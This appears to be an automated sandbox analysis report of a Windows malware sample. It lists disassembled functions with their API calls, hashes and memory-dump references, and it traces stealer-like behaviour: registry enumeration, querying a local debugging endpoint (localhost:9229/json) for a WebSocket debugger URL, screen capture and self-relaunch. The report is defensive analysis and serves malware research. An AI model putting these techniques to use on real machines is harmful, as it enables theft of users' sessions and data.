                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: a708292d9a5ee2c14a076dba10e22839f3b700a01096cd4dfcf580e215855533
                                • Instruction ID: b1543c71834db903fd512f1a941f0e5963fa0d610ee7fec1c1e2e7766563a2d6
                                • Opcode Fuzzy Hash: a708292d9a5ee2c14a076dba10e22839f3b700a01096cd4dfcf580e215855533
                                • Instruction Fuzzy Hash: 7EB19EB2910659AFCF12EFA4DC889EE77B9FF49300F054569E906E7250DB309E49CB90
                                Function 0039B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039B330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039B3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B3D9
                                • lstrlen.KERNEL32(003C4C50), ref: 0039B450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B474
                                • lstrcat.KERNEL32(00000000,003C4C50), ref: 0039B480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B4A9
                                • lstrlen.KERNEL32(00000000), ref: 0039B52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039B55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B587
                                • lstrlen.KERNEL32(003C4AD4), ref: 0039B5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B622
                                • lstrcat.KERNEL32(00000000,003C4AD4), ref: 0039B62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B65E
                                • lstrlen.KERNEL32(?), ref: 0039B767
                                • lstrlen.KERNEL32(?), ref: 0039B776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B79E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: e064fe6938770e434da60fb0de6bde7647be707e3c5d3d9a10b6211d65370111
                                • Instruction ID: a1705d176a3d4634c2c334326bb6c95ab645581bb409427e443ca518d306efa7
                                • Opcode Fuzzy Hash: e064fe6938770e434da60fb0de6bde7647be707e3c5d3d9a10b6211d65370111
                                • Instruction Fuzzy Hash: 56023D31A01606DFCF26DF65EA89B6AF7F5AF54304F1A806DE4099B261DB31DC46CB80
                                Function 003B3760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                                • RegOpenKeyExA.ADVAPI32(?,00F7BD60,00000000,00020019,?), ref: 003B37BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 003B37F7
                                • wsprintfA.USER32 ref: 003B3822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 003B3840
                                • RegCloseKey.ADVAPI32(?), ref: 003B384E
                                • RegCloseKey.ADVAPI32(?), ref: 003B3858
                                • RegQueryValueExA.ADVAPI32(?,00F7F298,00000000,000F003F,?,?), ref: 003B38A1
                                • lstrlen.KERNEL32(?), ref: 003B38B6
                                • RegQueryValueExA.ADVAPI32(?,00F7F2B0,00000000,000F003F,?,00000400), ref: 003B3927
                                • RegCloseKey.ADVAPI32(?), ref: 003B3972
                                • RegCloseKey.ADVAPI32(?), ref: 003B3989
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: 77ff527ca365cbead0f21d46a64287350f3ea25de6fc34a5e71272293c79b25e
                                • Instruction ID: e0e2fc74a45a3f3dc35e87259cd0d9bfaf6e11fd2eb8cae3db18af52b2dd5e37
                                • Opcode Fuzzy Hash: 77ff527ca365cbead0f21d46a64287350f3ea25de6fc34a5e71272293c79b25e
                                • Instruction Fuzzy Hash: 7491BD729002189FCB11DFA4CC85EEEB7B9FF88314F158569E609AB611DB31AE45CF90
                                Function 003990C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 003990DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003990FC
                                • InternetCloseHandle.WININET(00000000), ref: 00399109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 00399166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00399197
                                • InternetCloseHandle.WININET(00000000), ref: 003991A2
                                • InternetCloseHandle.WININET(00000000), ref: 003991A9
                                • strlen.MSVCRT ref: 003991BA
                                • strlen.MSVCRT ref: 003991ED
                                • strlen.MSVCRT ref: 0039922E
                                • strlen.MSVCRT ref: 0039924C
                                  • Part of subcall function 00398980: std::_Xinvalid_argument.LIBCPMT ref: 00398996
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: 32f07e25f6d9cbe40d770a9474479f8f6ddab82569df5f0a5bf1928eb8735cff
                                • Instruction ID: e34de0c44470fa8f2d05f69d0f68e3b72584de7d751cea7d88c2b6927aed8324
                                • Opcode Fuzzy Hash: 32f07e25f6d9cbe40d770a9474479f8f6ddab82569df5f0a5bf1928eb8735cff
                                • Instruction Fuzzy Hash: 6151E471600209ABDB21DFA8DC85FEEF7F9EB48710F140469F545E7280DBB4AE4887A1
                                Function 003B1660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 003B16A1
                                • lstrcpy.KERNEL32(00000000,00F6A798), ref: 003B16CC
                                • lstrlen.KERNEL32(?), ref: 003B16D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B16F6
                                • lstrcat.KERNEL32(00000000,?), ref: 003B1704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B172A
                                • lstrlen.KERNEL32(00F7EAF0), ref: 003B173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B1762
                                • lstrcat.KERNEL32(00000000,00F7EAF0), ref: 003B176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1792
                                • ShellExecuteEx.SHELL32(?), ref: 003B17CD
                                • ExitProcess.KERNEL32 ref: 003B1803
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: 7c3c69ffa7a44a8a471912c84cb4bafcb40ab63054a3b77d618b4bdc1947bbc0
                                • Instruction ID: 49026b5af6de7848f447f60593de6a1cd97d4a936e74a44478f7aee095ad4053
                                • Opcode Fuzzy Hash: 7c3c69ffa7a44a8a471912c84cb4bafcb40ab63054a3b77d618b4bdc1947bbc0
                                • Instruction Fuzzy Hash: A651A171A01A1AAFCB12DFA4CC99ADEB7F9AF54300F454125E605E7251DF30AE05CB90
                                Function 003AEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AEFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AF012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003AF026
                                • lstrlen.KERNEL32(00000000), ref: 003AF035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 003AF053
                                • StrStrA.SHLWAPI(00000000,?), ref: 003AF081
                                • lstrlen.KERNEL32(?), ref: 003AF094
                                • lstrlen.KERNEL32(00000000), ref: 003AF0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AF0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AF13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: ee5b8604cd59b7c91161beb9847676a871656cd5fa3b0780f7ea335d06301ecc
                                • Instruction ID: 8d9a2fc1dd86a513172436172ea29d5ebd9c77c5b2dac971591f82754069d27d
                                • Opcode Fuzzy Hash: ee5b8604cd59b7c91161beb9847676a871656cd5fa3b0780f7ea335d06301ecc
                                • Instruction Fuzzy Hash: 05515C36911905AFCB23EBB8D859EAF77A4EF56700F064568E846DB212DF30DC058B94
                                Function 0039A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(00F78A68,005C9BD8,0000FFFF), ref: 0039A026
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039A053
                                • lstrlen.KERNEL32(005C9BD8), ref: 0039A060
                                • lstrcpy.KERNEL32(00000000,005C9BD8), ref: 0039A08A
                                • lstrlen.KERNEL32(003C4C4C), ref: 0039A095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A0B2
                                • lstrcat.KERNEL32(00000000,003C4C4C), ref: 0039A0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039A0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A114
                                • SetEnvironmentVariableA.KERNEL32(00F78A68,00000000), ref: 0039A12F
                                • LoadLibraryA.KERNEL32(00F65188), ref: 0039A143
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: 635608c8e6261c3f8a8e39ee50f378a9e6715c8a96d19e6808f882bd7901ab76
                                • Instruction ID: e1b4d25fe0fa29057e83d4dab9e5cb584e02e8b9ba38b5f6ed90fbb977a4a863
                                • Opcode Fuzzy Hash: 635608c8e6261c3f8a8e39ee50f378a9e6715c8a96d19e6808f882bd7901ab76
                                • Instruction Fuzzy Hash: 6F91B131A00E109FDF329FA4DC89E7737A5ABA4704F464658E9058B2A1EFB5DC44DBC2
                                Function 003AC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AC8A2
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AC8D1
                                • lstrlen.KERNEL32(00000000), ref: 003AC8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AC932
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003AC943
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: f6325deab326ec46f6d3751c758e64c54011c8545d9afb24a1fdd0bc5300addf
                                • Instruction ID: a15ab3b5628a72714958f8384eb30de7489e33579a525c5c8a248d611bbaec30
                                • Opcode Fuzzy Hash: f6325deab326ec46f6d3751c758e64c54011c8545d9afb24a1fdd0bc5300addf
                                • Instruction Fuzzy Hash: AC61B371D2161AAFDB12EFB5C849ABF7BB8FF16340F055569E841EB201DB348D058B90
                                Function 003B41E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,003B0CF0), ref: 003B4276
                                • GetDesktopWindow.USER32 ref: 003B4280
                                • GetWindowRect.USER32(00000000,?), ref: 003B428D
                                • SelectObject.GDI32(00000000,00000000), ref: 003B42BF
                                • GetHGlobalFromStream.COMBASE(003B0CF0,?), ref: 003B4336
                                • GlobalLock.KERNEL32(?), ref: 003B4340
                                • GlobalSize.KERNEL32(?), ref: 003B434D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
